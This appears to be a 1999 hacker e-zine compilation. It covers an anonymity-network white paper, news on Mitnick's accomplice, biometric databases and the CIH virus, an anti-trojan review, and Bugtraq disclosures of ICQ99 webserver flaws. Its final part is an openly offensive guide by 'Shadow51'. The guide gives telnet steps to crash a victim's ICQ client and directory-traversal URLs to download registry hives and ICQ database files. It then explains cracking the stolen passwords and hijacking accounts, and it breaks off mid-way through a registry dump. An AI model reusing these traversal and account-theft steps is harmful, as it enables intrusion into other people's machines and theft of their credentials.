Currently, there is only one such pool operated by ZKS. Additional pools are expected in the future. The digital identity's digital signature is applied to the original message at the client (prior to its multiple encryption), and its integrity is verified by the nymserver before the message is sent. The digital identity is not known to any of the AMPs, with the exception of the nymserver. The integrity of the pseudonym is maintained, and the confidentiality of the message headers is maintained until the Freedom Mail Gateway. Since the digital identity's digital signature is used, the integrity of the message and the sender can be verified prior to its release, thus ensuring against any impersonation of the digital identity. Wormhole The Wormhole is the interface between the anonymous network cloud and Internet hosts accessed by the end user. When a new ACI is presented to the wormhole, the wormhole assigns a new port for it to pass TCP/UDP traffic. The wormhole, however, does not monitor the state of the TCP connection÷the AIP will notify the wormhole that a route has been destroyed, so the wormhole can release the port-to-ACI map. The wormhole only responds to address requests for its own IP address. Any remaining relevant personal information is stripped, and the packet goes into the real world of the Internet. Traffic Shaper The Traffic Shaper fulfills a dual role as both Internet bandwidth throttle and link padding envelope shaper. Bandwidth Throttle Most Freedom Server operators will not be able to dedicate their entire upstream connectivity bandwidth to Freedom. The Bandwidth Throttle settings determine the maximum bandwidth that will be allocated by the Freedom Server to anonymous Internet connections. Link Padding Envelope Shaper Inter-AIP link padding is required to prevent traffic analysis of data passing over AICs. However, the outer bandwidth envelope does not have to continually be operated at the maximum bandwidth allowed by the Bandwidth Throttle. As long as the outer envelope modulation is kept independent of the data flowing through the link, information leakage will not occur. To minimize bandwidth costs, the Link Padding Envelope Shaper modulates the outer link envelope as determined by a formula that takes into account historical usage patterns and traffic flows. Freedom Client Software The Freedom Client application runs on the user's computer and acts as a Local Anonymous Internet Proxy (LAIP). The Freedom client provides support and acts as proxy for various Internet protocols, including DNS HTTP HTTPS SMTP POP3 Telnet SSH IRC (DCC not supported) USENET (via a web interface) The client is, conceptually, an input funnel that anonymizes all Internet traffic before it leaves the client system to the Freedom network. Freedom avoids the trouble of managing the mail or browsing clients, since it operates at the Winsock, session, and network levels. Freedom monitors outgoing streams and warns the user if it detects the presence of any personal information. The user then chooses to remove the information or release the message as is. The Freedom client also acts as a personal data manager. The release of personal data is contextual, based on the source and the active digital identity. A typical example of controlled information release is when a user wishes to access a mandatory-registration site, but does want to reveal personal information. Using Freedom, the user creates a digital identity to access the site; a cookie is then created using this user's pseudonymous profile. Whenever the user returns to that site, the same information is read from the cookie, granting the user access without accidentally revealing sensitive information. The user decides what personal information is divulged and whether it is false or accurate, while the Freedom client's task is to ensure that this process remains consistent. Freedom Mail Gateway The Freedom Client sends all outgoing email to the Freedom Mail Gateway using AMTP. The Freedom Mail Gateway keeps a reordering pool in which emails are kept for a random period of time before being put into the outgoing message queue. Conversely, incoming email is stored in the reordering pool before being delivered through the AMP chains specified by the user's reply blocks. Freedom Network Information Database The Freedom Network Information Database (NIDB), stores the topological maps of the Freedom network, link performance statistics, and node status information. Freedom Keyserver The Freedom Keyserver offers a publicly accessible database containing the public keys of each Freedom Node and of all Freedom identities. Zero Knowledge Systems does not store and at no time has access to the corresponding private keys of the independent Freedom Server operators or Freedom users. The private keys are generated on and never leave the individual Freedom Server or the Freedom client software. Comparison with other proposed Internet Privacy Systems Mixmaster Mixmaster is an existing freeware email-only remailer. Freedom Mixmaster Perfect forward secrecy. Future compromise of the remailer key allows attacker to decrypt all past traffic Does not know previous mail hop. Remailer chain can not be backtracked. Does know previous mail hop. A legal attacker may be able to travel up the chain, leading to the discovery of the email's sender. Both link and application level anonymizing. Application level only anonymizing Onion Routers Onion Routers are an application proxy based TCP anonymizer proposed by the US Naval Research Laboratory. Freedom Onion Routers Anonymous network payload is IP level. Any protocol on top of IP can be supported. Based on application level proxies. Each additional application requires an additional proxy. Utilizes end-to-end TCP congestion control TCP link level encryption causes unnecessary packet retransmission. Traffic is encrypted before leaving the client Traffic in the clear before reaching first node Bibliography Ross Anderson, "The Eternity Service", PRAGOCRYPT 96. ftp://ftp.cl.cam.ac.uk/users/rja14/eternity.ps.Z Andre Bacard, "Anonymous Remailer FAQ", 1996. http://www.well.com/user/abacard/remail.html Douglas Barnes, "The Coming Jurisdictional Swamp of Global Internetworking (Or, How I Learned to Stop Worrying and Love Anonymity)", unpublished manuscript, 16 Nov 1994. http://www.communities.com/paper/swamp.html David Chaum, "Untraceable Electronic Mail, Return addresses, and Digital Pseudonyms", Communications of the ACM, February 1981, vol. 24 no. 2. http://www.eskimo.com/~weidai/mix-net.txt Lance Cotrell, "Mixmaster & Remailer Attacks", 1995. http://www.obscura.com/~loki/remailer/remailer-essay.html Ray Cromwell, "Welcome to the Decense Project", 1996. http://www.clark.net/pub/rjc/decense.html Wei Dai, "PipeNet 1.1", 1998. http://www.eskimo.com/~weidai/pipenet.txt Arnoud Engelfriet, "Anonymity and Privacy on the Internet", 19 Dec 1996. http://www.stack.nl/~galactus/remailers/index.html Ian Goldberg, David Wagner, and Eric A. Brewer, "Privacy-enhancing technologies for the Internet", IEEE COMPCON '97, February 1997. http://www.cs.berkeley.edu/~daw/privacy-compcon97-www/privacy-html.html Ian Goldberg and David Wagner, "TAZ Servers and the Rewebber Network: Enabling Anonymous Publishing on the World Wide Web", Published in the First Monday electronic journal, vol 3 no 4. http://www.firstmonday.dk/issues/issue3_4/goldberg/index.html C. Gulcu and G. Tsudik, "Mixing E-mail with Babel", Proc. Symp. Network and Distributed System Security, 1996, pp. 2-16. Andreas Pfitzmann and Michael Waidner, "Networks without user observability--design options", EUROCRYPT 85, LNCS 219, Springer-Verlag, pp. 245-253. Paul Syverson, David Goldschlag, Michael Reed, "Onion Routing," http://www.onion-router.net/Publications.html Glossary ACI: Anonymous Connection ID AIP: Anonymous Internet Proxy AMP: Anonymous Mail Proxy AMTP: Anonymous Mail Transfer Protocol ATCP: Anonymous TCP LAIP: Local Anonymous Internet Proxy NIDB: Network Information Database Trademark Notices Freedom and the Freedom logo are trademarks of Zero-Knowledge Systems Inc. All other products and company names mentioned herein are the trademarks of their respective owners. © 1998 Zero Knowledge Systems http://www.zeroknowledge.com @HWA 08.0 Mitnick's accomplice pleads guilty ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mitnick's hacker accomplice pleads guilty By Dan Goodin Staff Writer, CNET News.com April 26, 1999, 2:05 p.m. PT URL: http://www.news.com/News/Item/0,4,35656,00.html Lewis DePayne, the accomplice to notorious hacker Kevin Mitnick, today pleaded guilty to one count of wire fraud for his role in a series of computer break-ins that took place over a three-year period, the U.S. Attorney's office in Los Angeles said. DePayne, 29, admitted that he took part in a plan to obtain sensitive software from cellular telephone maker Nokia by posing as a company employee. The count was 1 of 14 brought against him in a 1996 criminal complaint. DePayne entered his plea in federal court in Los Angeles before Judge Mariana Pfaelzer. Last month Mitnick pleaded guilty to 5 of 25 counts in the same court. DePayne's attorney was not immediately available for comment. DePayne is scheduled to be sentenced July 12. Under a plea agreement, U.S. attorneys will recommend that DePayne eceive six months' detention, five years of probation, and up to $3,000 in fines, said assistant U.S. attorney Chris Painter. He also will have to tell investigators and the companies he is accused of defrauding exactly how he and Mitnick were able to penetrate security systems. DePayne, who lives in Northern California, has been free on bail, Painter said. DePayne and Mitnick are known for their ability to hack computer systems and to "social engineer" employees responsible for security at high-tech companies. When Mitnick was trying use cell phones to break in to computer systems, he called Nokia posing as an employee and asked that software be sent to him. When that didn't work, DePayne posed as the fictitious employee's supervisor. Suspecting the requests were a hoax, Nokia recorded the call and provided investigators with tapes. Mitnick's exploits made national headlines after his capture was reported in The New York Times and later in the book Takedown. Mitnick, 39, is accused of breaking in to numerous computer networks, accessing thousands of credit card numbers, and stealing software between 1992 and 1995. U.S. attorneys fighting high-tech crime appear to be on a roll. Two weeks ago, investigators tracked down the man they say posted a bogus Bloomberg story that caused a publicly traded company's stock to surge more than 30 points. Last week they identified the suspect in a case in which anonymous email that threatened the lives of court officials was posted on the Internet. "Our offices and other offices around the country will be investigating when people cause damage to companies, infrastructure, and proprietary data," said Painter. "These companies ought to have protection." @HWA 09.0 Biometric Databases? ~~~~~~~~~~~~~~~~~~~~ http://www.wired.com/news/news/politics/story/19338.html http://www.wired.com/news/print_version/politics/story/19338.html?wnpg=all DNA Databases Go Too Far by Declan McCullagh 2:15 p.m. 26.Apr.99.PDT WASHINGTON -- If Representative Ron Paul has his way, federal agencies will not be able to assemble biometric profiles of Americans. The Texas Republican wants to prohibit massive government databases of DNA samples, photographs, and retinal scans. "It seems like everywhere you turn there's another government attempt to accumulate more information about us. This bill will be designed to stop those moves that use government money to set up data banks with DNA and other identifiers, such as pictures of the retina," Paul said in an interview. Aides to Paul, who has emerged as a prominent privacy advocate in Congress, drew up the sweeping new bill after a public outcry arose over federal tax dollars being used to build a national database of driver-license photographs. The US Secret Service paid Image Data LLC US$1.5 million to develop the database, which has become the target of at l east two lawsuits since the agency's role became public. "The fact that this was started with a grant from the Secret Service shows they're moving in that direction," Paul said. "This whole process smells bad to me, and I thought I'd call attention to it among my colleagues by introducing this bill." An early draft of the proposed Privacy Protection Act would prevent the use of Secret Service funds -- or any tax dollars, for that matter -- to create any database containing biometric information about Americans. The federal government has recently begun to record more biometric information about Americans. Biometric technology allows the automatic recognition of a person based on physical characteristics. The Army issues recruits at Fort Still, Oklahoma stored value cards that require the correct fingerprint to use. The Immigration and Naturalization Service uses voice-identification technologies at some airports. The FBI is busy scanning paper fingerprint cards to create digital images and is feeding them into the National Crime Information Center computer, which the government says receives more than 2 million queries a day. The NCIC database is already overflowing with information about 32 million Americans, and Attorney General Janet Reno wants to add DNA samples taken from anyone arrested. A preliminary version of the bill, which Paul hopes to introduce by the end of the week, would approve databases created by the Social Security Administration, the IRS, the Census Bureau, and the Department of Veterans Affairs. And prohibition would not apply to the "collection and use of names and Social Security numbers by the Social Security Administration and the Internal Revenue Service for functions directly related to the collection of revenue and the administration of the Social Security program." Paul's staff said that the final version of the proposal would limit the expansion of existing databases. "The creation of national databases has gone out of control over the last 10 years," said David Banisar, a lawyer at the Electronic Privacy Information Center. They're "frequently at the instigation of Congress, which has created them in the name of fighting immigration or welfare fraud or any number of issues. This often happens in secret, with no public accountability or privacy protections." Banisar added, "It's a very positive step that Congress is starting to recognize, after all this time, the dangers of these databases." But some experts say that the draft may go too far. "It could be too broad. I do think the federal government has a legitimate role in dealing with interstate cooperation in terms of crime. It seems reasonable to me that the federal government could fund an interstate crime database project...What about a hospital using federal grant funds to come up with a database containing medical records about its patients?" asks Eugene Volokh, a law professor at the University of California at Los Angeles. Paul also has introduced legislation that would protect financial privacy by getting rid of the so-called Know Your Customer plan proposed -- and since abandoned -- by banking regulators. @HWA 10.0 In the wake of CIH... ~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ CIH, Killer or Dud? contributed by Anonymous The media frenzy continues although at this point it is hard to tell if CIH was a major infestation or mostly media Hype. Some reports are claiming ridiculous amounts of damage while others say there was almost no damage. Singapore checks in with 150 reported incidents. Channel New Asia http://www.channelnewsasia.com/articles/1999/4/26/news1040.htm ZDNet http://www.zdnet.com/zdnn/filters/bursts/0,3422,2247380,00.html South Korea had an estimated 15% or 1 million systems hit costing the country up to 300 billion won (US$253.86 million) in related repair costs. A ndover News http://www.andovernews.com/cgi-bin/news_story.pl?155551/topstories CIH hits 12 of 60 brokerage houses in Malaysia. The infections did not hinder the performance of Malaysia's benchmark stock index. International Herald Tribune http://www.iht.com/IHT/TODAY/TUE/FIN/wirus.2.html Many government offices wiped out in Turkey. Private banks, police departments, an army school, state TRT television, Title Deeds and Land Survey office and state-owned Kalkinma Bank where some of the places hit. CNN http://customnews.cnn.com/cnews/pna.show_story?p_art_id=3663070&p_section_name=On+Target&p_art_type=1460518 Most damage relegated to Asia and Europe. Data Fellows reports damage in Hong Kong, Singapore, India, Finland, New Zealand, Britain, Sweden, Japan, and Malta. C|Net http://www.news.com/News/Item/0,4,0-35632,00.html?st.ne.fd.mdh.ni CIH hits Boston College hard, students lose a semesters worth of work. MSNBC says that while there where pockets of infections most people where unaffected. MSNBC http://www.msnbc.com/news/262104.asp Austrailia says 'No Meltdown" Australian Broadcasting Corporation http://www.abc.net.au/news/newslink/weekly/newsnat-27apr1999-42.htm While no where near as widespread as Melissa, CIH was much more deadly. Nando Times http://www.techserver.com/story/body/0,1634,42451-68484-495994-0,00.html PC World http://www.pcworld.com/pcwtoday/article/0,1510,10717,00.html Wired http://www.wired.com/news/news/technology/story/19334.html CIH turned out to be no big deal with minimal damage. Detroit Free Press http://www.freep.com/tech/qvirus27.htm The Akron Beacon Journal http://www.ohio.com/bj/business/docs/026278.htm 10.1 CIH 1.2 Virus Hits Few ~~~~~~~~~~~~~~~~~~~~~~ Only a small number of PCs get blasted by the "Chernobyl" virus. by Reuters April 27, 1999, 4:32 a.m. PT The CIH 1.2 ("Chernobyl") virus hit computers around the world on Monday, wiping out data on hard drives and even causing some PCs to fail when starting up, computer experts said. Although the virus hit only a tiny fraction of the number of machines affected by the recent Melissa virus, the new bug's bite was much more deadly for an unfortunate few. "I've talked to people who, literally, were crying on the telephone--a woman whose poetry book was almost done and was completely lost, a man whose doctoral dissertation was lost. They were devastated," said Mikko Hermanni Hypponen, of computer security firm Data Fellows in Helsinki. The worst damage appeared to be taking place in Asia and parts of Europe, where antivirus protection is less prevalent, and with pirated software, which is often filled with bugs. Data Fellows reported damage in Hong Kong, Singapore, India, Finland, New Zealand, Britain, Sweden, Japan and Malta, with hundreds of machines already being hit even before the United States opened for business. The bulk of the computers affected were in Asia, Data Fellows said. A Handful Hit Carnegie Mellon University's Computer Emergency Response Team said it knew of only a few dozen computers hit by the virus. "It really hasn't been that bad," said a CERT case worker. But the Chernobyl virus's limited impact did little to console those who were infected. DataFellows' Hypponen said that the cost of repairs could run into the millions of dollars. "Unlike Melissa, this is causing real problems and serious loss of data for some people," he said. CERT said that data "may be unrecoverable" if the virus hits, and software needs to be reinstalled from the ground up to make computers work again, a task beyond the expertise of most home computer users. "I just turned on the doggone thing and the screen was almost totally black--it said 'os load in progress' and then it said 'insert bootable media in appropriate drive,' said one person hit by the virus, Christina Asksomitas of Palm Beach Country, Florida. "We tried to reboot it but nothing works." The virus struck the campus of Boston College in Chestnut Hill, Massachusetts, shortly after midnight on Monday, wiping out the hard drives of about 100 students, many of whom were preparing term papers, school spokesperson Jack Dunn said. Virus Hits Monthly Computer experts said users could avoid the virus by not booting up their computers Monday, or resetting the date, since the virus is activated when computer utility systems hit the twenty-sixth of each month. While the virus has been hitting on the twenty-sixth day of each month since last year, this month's version was expected to be the most prevalent and dangerous. The April CIH virus is called the Chernobyl virus because it's timed to go off on the anniversary of the Soviet nuclear accident, one of technology's worst disasters. Up-to-date antivirus software will spot the virus, and many corporate computers have recently upgraded their protection because of the Melissa scare. Copyright © 1999 Reuters Limited @HWA 11.0 Lockdown2000 review by BHZ ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ INTRO We live on the edge of this millennium. Computers are become to people what TV sets were before few decades. Main things that we want on the Internet is privacy and security. Security is always tested with some new bugs, flaws and vulnerabilities. So we must be always secured. Most of the Windows95 users, are targeted by some trojans. DEFINITION OF TROJAN Trojans could be defined on this ways: An unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user. A legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user. Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and probably unwanted) by the user. LOCKDOWN2000 There are many solutions for securing yourself from trojans. From monitoring your registry to some commercial and non commercial programs. I think that best program I have used in trojan detection is Lockdown2000. The main thing in good anti-trojan cleaners is that they can be upgradeable. The staff behind Lockdown2000 is always on alert, so you can download newest trojan definitions from their website. Lockdown2000 sits in your system tray and it scans your computer in time interval that you enter. It has two modes - Scan for unknown trojans and Background scan for trojans. Ok so this is a lifesaver option. It monitors your registry and some system files for new entries. When some change is made, you are being automatically alerted, and now you can acknowledge that this string or file will be deleted or not. It helped me when I was downloading and checking some files from a trusted host, and in one moment something beeped and Lockdown2000 window opened. It detected a file which tried to add its string to the start directories in registry. I prompted that I don't want to keep this file, and it was immediately deleted. I later looked more into that file, and it was modified version of Back Orifice. I deactivated Lockdown2000 and installed that trojan (LM BO.LEENTech), and scanned my computer with some other trojan cleaners, and it wasn't found. So trojan cleaner and registry monitor in one program is winning combination. This current trojan signature file has 88 trojan definitions in it. So my opinion is that this is very impressive number. Lockdown2000 has even more quality functions: Port sniffer It listens some ports on your computer, which are used to be connected on with trojan client program. TraceRoute Ok so someone pinged (sent you tcp packets and waits for reply if port is open) you on some trojan-used port. Lockdown2000 gives you his IP address. Now with TraceRoute you can trace the "attacker", to his Internet Service Provider, and you can report him to admins WhoIs Very useful because you don't have to connect Internic (or some other domain seller - yes Internic lost monopoly on it), because you can do it from program who is always close to you - in your system tray. File Sharing File and Print sharing was very popular intrusion method some months ago when it was reported by Rhino9, and Legion software (scans for "open" computers) was produced. If you have some disk partitions which must be opened to just a group of people, you just use Lockdown2000 and put a password on the share. LOCKDOWN2000 INFO Program name: Lockdown2000 v.2.5.4 Website : http://www.lockdown2000.com Tech support : support@lockdown2000.com BHZ bhz@net-security.org http://net-security.org @HWA 12.0 ICQ99 Vulnerabilities and Exploits ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Sun, 25 Apr 1999 22:46:02 +0400 From: delta To: BUGTRAQ@netspace.org Subject: ICQ 99 Password Hi! I find that icq 99 stored password in open text in file ICQ\NewDB\uin#.dat try open it with note pad , hit search and enter your password . Password always placed in the end of line "iUserSound" Thanx! ---------------------------------------------------------------------------- Date: Mon, 5 Apr 1999 23:50:56 +0200 From: Jan Vogelgesang To: BUGTRAQ@netspace.org Subject: security hole in ICQ-Webserver Hi, Some days ago i've read a message here in Bugtraq from Ronald A. Jarell about a vulnerability in the ICQ-Webserver . I tried to reproduce this vulnerability with my computer (win95) and find out the following: -sending any non-http stuff or even a simple "get" (without any other characters however) crashes the ICQ-Client. This works with ICQ99a V2.13 Build 1700, but not with Build 1547. Moreover, there is a much bigger hole in the ICQ-Webserver: If you have the webserver enabled, everyone can access your complete(!) harddisk with a simple webbrowser. When your page is activated and you are online, each request to "http://members.icq.com/" will be redirected to your computer. Thus, every visitor get to know your current ip. Nevertheless, only the files in "/ICQ99/Hompage//personal" should be accessible. But a visitor can "climb up" the directory tree with some dots, e.g. "http:///...../a2.html" would present him the file "a2.html" in the "ICQ99" directory. With some more dots, he would come to the root-directory of your harddisk. But there is one barrier: The ICQ-Webserver only delivers files with a ".html" extension. After some experiments I found a way to trick it out: I add ".html/" to the URL and the Webserver sends every file I request. For instance, "http:///............./config.sys" won't work, but "http:///.html/............./config.sys" would. I have test this both with Build 1700 and with Build 1547. In my opinion, this is a significant security problem, because password files or even the registry in the windows directory can be read. I warned Mirabilis about it and hope they will informe the ICQ-community. sorry for my poor english... Jan Vogelgesang ------------------------------------------------------------------------------- Date: Thu, 8 Apr 1999 08:45:48 -0400 From: "[iso-8859-1] José Reyes Cedeńo" To: BUGTRAQ@netspace.org Subject: Re: ICQ Webserver bug >Well, my box was win 98, and the remote box I tested it against was >win 95. Didn't have anyone running NT handy to test against. However, >another person I corresponded with who was testing this did get it to >drop a 95 box, but not every time. Did it every time for me; but there's >apparently other factors that contribute as well. > >-- >Ron Jarrell >VA Tech Computing Center I try to test this on my NT box ( NT server 4.00.1381, Sevice pack 3 ) and I could not reproduce the error. I've used ICQ Version 99a Beta v.2.13 Build 1700. It would be beneficial if Ron Jarrell or Jan Vogelgesang, explained the procedure that they carried out to arrive to the error detailedly. Best regards, Jose. ------------------------------------------------------------------------------- Date: Thu, 8 Apr 1999 19:35:35 +0000 From: sven@MSC-MEDIA.COM To: BUGTRAQ@netspace.org Subject: Re: security hole (READ AS: security chasm) in ICQ-Webserver On 8 Apr, DaChronic wrote: > I can confirm this with Win9x but not with WinNT 4.0 sp3 and hotfixes > nor sp4 (can anyone else?). .......... As it was discussed some time ago in this list the 'more than 2 dot' feature is not working with NT. But it is definitely working with 95/98. Maybe replacing /.../ with /../../ will work ? CU Sven ------------------------------------------------------------------------------- Date: Thu, 8 Apr 1999 18:08:06 -0700 From: Scott To: BUGTRAQ@netspace.org Subject: Re: ICQ Webserver bug I'm using Win98/4.10.1998 w/ ICQ Version 99a Beta v.2.13 Build #1700 I could crash my ICQ webserver and read files remotely. When I have tried this on other computers, it only works some of the time, sometimes it returns "Forbidden" when I try to crash it or d/l files ------------------------------------------------------------------------------- Date: Thu, 8 Apr 1999 19:30:18 -0400 From: Kaven Rousseau To: BUGTRAQ@netspace.org Subject: Re: ICQ Webserver bug At 08:45 1999-04-08 -0400, you wrote: >>Well, my box was win 98, and the remote box I tested it against was >>win 95. Didn't have anyone running NT handy to test against. However, >>another person I corresponded with who was testing this did get it to >>drop a 95 box, but not every time. Did it every time for me; but there's >>apparently other factors that contribute as well. >> >>-- >>Ron Jarrell >>VA Tech Computing Center > >I try to test this on my NT box ( NT server 4.00.1381, Sevice pack 3 ) and I >could not reproduce the error. I've used ICQ Version 99a Beta v.2.13 Build >1700. It would be beneficial if Ron Jarrell or Jan Vogelgesang, explained >the procedure that they carried out to arrive to the error detailedly. > >Best regards, Jose. I tested it against my own win98 box with IE5 final (english) result: I was vulnerable. My friend with win98 and ie4 (french) result: vulnerable An other friend with win98 and IE5 (french) result: vulnerable we were all using ICQ99a build 1700 Method used: telnet to port 80 send: QUIT it disconnects after 5 to 10 seconds. , | | Kaven Rousseau | rousseau@globetrotter.qc.ca | FingerPrint: F1C8 F915 9F0F DD5E DACB 024B 5C6F 163D F097 40D6 `------------------- ---- -- - ------------------------------------------------------------------------------- Date: Sat, 10 Apr 1999 20:45:56 +0200 From: Frank Dekervel To: BUGTRAQ@netspace.org Subject: Re: ICQ Webserver bug humm, i d like to add one last thing to this according to me much too long thread. (seems some writers ain't thinking about the cause) if you have a look at the pseudocode below, which i suspect mirabilis to use, you ll find thousands of ways to exploit icq. fread(my_socket,"%s %s %s", getword, url, httpversion); /// if you only feed two or one word, it 'dumps core', gpf under windoze change the slashes in url to backslashes; url = "c:\program files\icq\webroot_dir\" + url; /// yes, this is the '../../../../' bug ... open(fd,url); read(fd,buffer); write(socket,buffer); close(socket); i think its this because i made small webserver earlier to see common bugs. i checked on the net, and the dynamic server of francois piete (known for delphi components) and various shareware servers, or remote admin modules for eg. proxy servers are vulnerable. greetz, kervel (kervel@svennieboy.terbank.kotnet.org) ---------------------------------------------------------------------------- @HWA 12.1 ICQ Homepage Exploit ~~~~~~~~~~~~~~~~~~~~ ICQ Homepage Exploit By Shadow51 Ever wondered why there is a little house beside the name of some people? That doesn't mean they are at home, it means they have the ICQ-Webserver running. The idiots who made it left huge bugs in it, like you can close their ICQ remotely, and even download their files. The only problem is that you can't see the files, so you have to know what you're downloading. To close the ICQ client: 1. Click on the start button 2. Click on RUN 3. Type Telnet 123.123.123.123 80 Of course replace the 123.123.123.123 by the IP of the victim (note that this bug only works on build 1700 and maybe a few others but I'm not sure). 4. Press ENTER Wait until it connects 5. Type QUIT Wait about 10 seconds. If they go offline that means it worked, if not, then it didn't work. Now suppose you want to get some of their files. Lets say that you want to see the file c:\windows\win.ini, and he or she has the ICQ-Webserver on: 1. Go to your browser 2. Type http://123.123.123.123/.html/......../windows/win.ini note that you need the /.html/ part. It will trick the server into believing it's a html file, and note that there are 8 dots /......../ (that means it goes back 4 dirs if the users ICQ dir is not in a standard place. It can cause problems, but 95% of the time it's in c:\progra~1\icq\ 3. press ENTER in your browser It will simply ask you where you want to save the file the you save it and do what ever you want with it. Now this is not all you can do. There are much better things with this exploit, like getting the user's password files and registry. If you are a lamer, I suggest you go and play with what you just learned, and stop reading now cause this is a bit too complicated for you :P. Okay, so you want to have the registry and all the passes. Okay, before you do this, I warn you that if the user your hacking is not using the same version of Windows you are using, you could end up with a lot of problems. Suppose you have Win98, and they have win95, and it wont work. An easy way to make sure it's the same version is to download their command.com with the exploit, and compare the size with your command.com. There are many other ways, but this is a good one. 1. Get 2 files http://123.123.123.123/.html/......../windows/user.dat and http://123.123.123.123/.html/......../windows/system.dat Remember to change the IP when your done. 2. Copy them in a directory. 3. Make a backup copy of you c:\windows\user.dat and c:\windows\system.dat You're gonna want to have them back when you're done. 4. Restart your computer 5. Press F8 just before it boots up 6. Choose "Command Prompt Only" 7. Delete your current user.dat and system.dat and replace them with the ones from the guy you hacked 8. Reboot your computer 9. Just before it boots, press F8 several times; choose safe mode. 10. Once booted in safe mode, click on start 11. Click on RUN 12. Type regedit 13. Press ENTER 14. Once in Regedit, click on the menu "Registry", then choose "Export Registry File..." 15. Save the file, then get yourself a Password Cracker 16. If all goes well, you now have all the users passwords. It should look something like this: crypt_Blizzard_Storm : A@N www.mircosoft.com : Administration:PASSWORD *Rna\Dan\dannyk : q34ad6gt *Rna\Test\957935 : nar8s7yj *Rna\Test2\wolves : cyal8r *Rna\Test3\curtisph : q73vnrht *Rna\My Connection\USERNAME : PASSWORD *Rna\My Connection 3\USERNAME : PASSWORD 17. Reboot 18. Press F8 at startup 19. Choose "Command Prompt Only" 20. Replace user.dat and system.dat with your originals that you previously had backed up Shadow51 29000000 Shadow51@writeme.com ----------------------------------------------------------------------------------------------------------------------- ICQ Account Cracking By Shadow51 A lot of people have been asking me how it would be possible to crack ICQ accounts. It's very easy, but unfortunately it doesn't work every time. All you do is put in this: 1. Download the following files from the targeted users hard drive using the ICQ exploit: (replace 123.123.123.123 by the guys IP and UIN by the guys ICQ #) (note that there's 6 dots not 8) http://123.123.123.123/.html/....../db/UIN.idx http://123.123.123.123/.html/....../db/UIN.dat http://123.123.123.123/.html/....../db/UINmsg.dat http://123.123.123.123/.html/....../db/UINmsg.idx http://123.123.123.123/.html/....../db/UINhis.idx http://123.123.123.123/.html/....../db/UINhis.dat 2. Open Notepad and create a new document. 3. Copy this into it. (Replace all the HACKEDUIN by the UIN you're hacking) (I got this registry key from http://i.am/devil) REGEDIT4 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN] "Name"="Hacked UIN" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs] "Random Groups Version"=dword:0000000a "Online Color"=dword:00ff0000 "Unlisted Color"=dword:00800000 "Offline Color"=dword:000000ff "Authorize Color"=dword:00400080 "Notify Color"=dword:00800080 "LastStatus Color"=dword:00008000 "Default File Dir"="C:\\Program Files\\ICQ\\Received Files" "SMTP Address"="" "DND Message"="Please do not disturb me now. Disturb me later." "Out Message"="" "Busy Message"="User is occupied. Only urgent messages will be delivered." "Chat Message"="I would like to chat about anything" "Away PreNum"=dword:00000000 "Out PreNum"=dword:00000000 "Busy PreNum"=dword:00000000 "DND PreNum"=dword:00000000 "Chat PreNum"=dword:00000000 "File Options"=dword:00000004 "URL Options"=dword:00000004 "Chat Options"=dword:00000004 "All Options"=dword:0000000e "EXT Options"=dword:00000004 "Startup"="No" "Auto Away"="No" "Auto Hide Time"=dword:0000001e "Auto Hide"="No" "Move Server Top"="No" "Blink In Tray"="No" "Sort Lists"="Yes" "Show Online List"="No" "Remove AddFriend"="Yes" "Splash Open"="Yes" "History Last First"="Yes" "FloatTop"="Yes" "Thru Server"="No" "Join Chat"="No" "Open URL Browser"="No" "Refuse File NotInList"="No" "Overwrite ExistFile"="No" "Disable Online Alert"="Yes" "Accept Urgent In Busy"="No" "Blink Tray In AwayBusy"="Yes" "Use Contact List Color"="No" "Contact List Color"=dword:00c8b99d "Save User File"="Yes" "Auto Update"="Yes" "Search Wizard"="No" "Default Mailer"="Yes" "Pop Play Sound"="Yes" "Pop Auto Launch"="No" "Pop Check"="No" "Pop Time"=dword:0000000a "Check Headers"="Yes" "MoveToOutDelay"=dword:00000014 "MoveToOut"="No" "MoveToAwayDelay"=dword:0000000a "MoveToAway"="No" "Auto Sleep Mode"="No" "Log History Events"="Yes" "Connection Type"="Permanent" "Firewall"="Yes" "UseGivenIP"="No" "Socks"="No" "SocksPort"=dword:00000438 "SocksServer"="Enter your socks server" "ProxySocks4Host"="Enter your proxy server" "ProxySocks4Port"=dword:00000438 "UseProxySocks4"="No" "GiveStats"="No" "SocksVersion"=dword:00000004 "SocksAuthentication"=dword:00000000 "FirewallTimeout"=dword:0000001e "UseFirewallTimeout"="No" "UseFirewallRangePorts"="Yes" "FirewallFromPort"=dword:000059d8 "FirewallToPort"=dword:00007148 "Old Sockets"="No" "UserType"=dword:00000000 "Mail Receipients"=";" "Random Available"="No" "RandomGroupName"=dword:00000001 "Random Name"="#Ąd¶ł 666 Ł[" "Allow Secure Clients Only"="Yes" "PhoneApproval"="Yes" "PhoneToneTime"=dword:00000032 "PhonePauseTime"=dword:000001f4 "PhoneBreakTime"=dword:00000028 "PhoneSettings"=dword:00000001 "PhonePauseChar"="," "PhoneLocalP"=" " "PhoneLongP"=" " "PhoneInterP"=" " "Chat RoomName"="Product Support / Suggestion" "Auto Join Chat Room"="Yes" "Novice Counter"=dword:0000000a "Menu Counter"=dword:00000013 "Servers Version"=dword:00000001 "Externals Version"=dword:00000019 "Stats"=hex:60,ff,ea,52,5c,36,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 